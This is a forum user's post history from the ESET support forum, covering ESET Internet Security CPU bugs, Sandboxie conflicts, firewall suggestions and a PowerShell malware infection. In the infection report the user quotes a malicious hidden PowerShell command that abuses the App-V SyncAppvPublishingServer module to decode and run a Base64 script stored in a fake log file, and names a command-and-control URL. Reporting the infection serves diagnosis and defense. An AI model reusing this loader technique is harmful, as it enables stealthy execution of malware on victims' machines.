Kevin999
-
Posts
43 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Kevin999
-
-
This bug reproduce today, I'll send you the log. @Marcos
-
5 minutes ago, Kevin999 said:
I think a potential problem is: Network connection page have lots of connection information item, because I running eMule and BitComet to share files, they will create mass TCP and UDP session, so egui.exe needs to update connection information frequently, thus consuming too much CPU.
If I set refresh interval = 5s, egui.exe CPU usage will suddenly grow up per 5 second.
-
I think a potential problem is: Network connection page have lots of connection information item, because I running eMule and BitComet to share files, they will create mass TCP and UDP session, so egui.exe needs to update connection information frequently, thus consuming too much CPU.
-
Especially at Network Connection page. If I exit at this page, egui.exe will still consuming CPU after main window close.
ESET Internet Security 16.1.14.0
By the way, egui,exe should be terminate after main window close.
-
I try to recovery the SyncAppvPublishingServer.vbs from EIS' quarantine, and I will sent it to you later. @Marcos
-
On 5/4/2022 at 8:39 PM, Shogun1 said:
Hey Ted,
I have the folder C:\Windows\System32\Tasks in my windows 11 and tried to erase.
I guess, you were saying but couldn't erase it...! My question is; did you mean that folder all of it or I misread that??
The same virus. It seems caused by a UltraEdit cracker.
-
On 7/13/2022 at 11:18 PM, itman said:
Create an exclusion for sandboxie .exe in Eset Deep Behavior Inspection setting and see if that helps:
If that doesn't help, then additionally create an Eset real-time performance exclusion for the entire Sandboxie C:\Programs Files or C:\Programs Files (x86) directory depending on where Sandboxie is installed installation directory as illustrated here: https://help.eset.com/essp/15/en-US/idh_performance_exclusions.html?idh_performance_exclusion.html .
Note: the above exclusion means Eset will no longer scan for malware in what is excluded.
Unfortunately, real-time performance exclusion for whole directory and exclusion for sandboxie .exe in Eset Deep Behavior Inspection seems doesn't work, this bug reprocedure yesterday.
-
This bug reproduce today, ekrn.exe cost>=50 CPU, and sandboxie couldn't delete contents, Unfortunately, after I try to unmount RAMDisk, this bug doesn't disappear, but it disappear after reboot.
-
Here's some discussions of Sandboxie users about CPU usage, sandboxie and ESET:
-
This bug reproduce today, ekrn.exe cost>=50 CPU, and sandboxie couldn't delete contents, but after I try to unmount RAMDisk, this bug disappear immediately. The sandboxie work folder is storage in RAMDisk.
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost ≥50% CPU, sandboxed firefox crash; becuse the unsandboxed firefox have been run for some time, so it works well. Edge could launch, but it no response after a while.
-
This bug reproduce today, but after I delete sandbox contains, this bug disappear.
I guess sandboxie maybe conflict with EIS?
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), although Firefox have been run for some time, it also couldn't open any website, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keep loading), because Firefox have been run for some time, so it works well, only IE could start again after exit. These web browsers all have processes after exit, and they couldn't terminated by task manager (acces denied). Besides, ping works well.
-
1 hour ago, itman said:
As noted in the 4sysops.com linked article I posted, Windows Remote Management often is deployed legitimately. Hence, my previous comment to only disable PS Remoting capability. This in most instances is enough to prevent a remote based PowerShell attack.
How about only disable PS Remoting capability (especially incoming package) by EIS firewall by default? Beacuse most user maybe don't know how to use powershell.
Besides, I think Windows Remote Management is less used by home user, EIS firewall could also block it by default to provide higher security.
-
I think ESET internet protection could block Windows Remote Management (WS-Management) by default (especially incoming package), and add an option to allow it manually.
-
18 minutes ago, itman said:
Note that if your VMware installation is vulnerable; refer to WMWare advisory I previously linked, you can still be exploited using whatever remote attack method the attacker chooses. You need to apply applicable WMware patches immediately.
What should I do? My computer has been install VMware Workstation 16 Pro (16.2.3 build-19376536).
-
1 hour ago, Marcos said:
The OP has just installed ESET and it detected a PowerShell malware:
Since then I haven't heard if the threat has been resolved or not.
The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that.
-
I also use ESET SysInspector to capture a snapshot, I can upload it if in need.
-
Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today.
- Conhost.exe and powershell.exe was running background, but I didn't run each of them.
- Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity.
- I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves.
- I use ESET SysInspector to captured a snapshot.
I used nslookup to reslove:
C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 192.168.1.1DNS request timed out.
timeout was 2 seconds.
*** 请求 UnKnown 超时C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 192.168.1.1非权威应答:
名称: api.private-chatting.com
Addresses: 2606:4700:3032::6815:38d6
2606:4700:3031::ac43:9c07
104.21.56.214__Today__
- I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
2. Find C:\Windows\logs\system-logs.txt , find these strings
Snipped: The code was moved to the the attached file to squeeze the post.Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";
It's as same as the URL in pcapng file.
-
10 hours ago, tommy456 said:
Which O/S are you using ? Plus what installed software if any do you suspect may be a underlying cause of this , assuming it isn't a misconfig issue from a dodgy /upgrade installation of ESET, have you tried a complete clean install of ESET using the ESET uninstall tool?
Now I using Windows 10 Enterprise LTSC 2022 x64 (21H2).
This bug even happened when I was using Windows 10 Enterprise LTSC 2019 x64 (1809), my Windows was clean upgrade (delete system partition, EFI system partition and recovery partition), so I can confirm I have been tried a complete clean install of ESET.
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, Edge and IE couldn't open any website (always keeping loading) and Edge no response after a moment. Firefox has been run for some time, and it's normal.
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, IE couldn't open any website (always keeping loading), Firefox and Edge couldn't launch (has processes).
I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.
-
This bug reproduce today. It also disappear after restart my computer.
Except ekrn.exe cost >=50% CPU, IE and Edge couldn't open any website (always keeping loading), Firefox is OK.
I will send you the dump later. By the way, I use ESET Log Collecter after restart computer though the dump was created first.
egui.exe will not auto terminate after main window close, and it sometimes consuming too much CPU
in ESET Internet Security & ESET Smart Security Premium
Posted
Bitcomet utilize too much CPU (about 1 CPU core, i.e ~25%) is a known issue caused by BitComet's UDP transmission thread (BT DHT network (and maybe uTP)), but egui.exe sometimes also utilize ~25% on my computer (Intel Core i5-4690, 4 cores).
Egui,exe CPU usage bug reproduce today, it happens when keeping at Network Connection page, I'll send you the log later.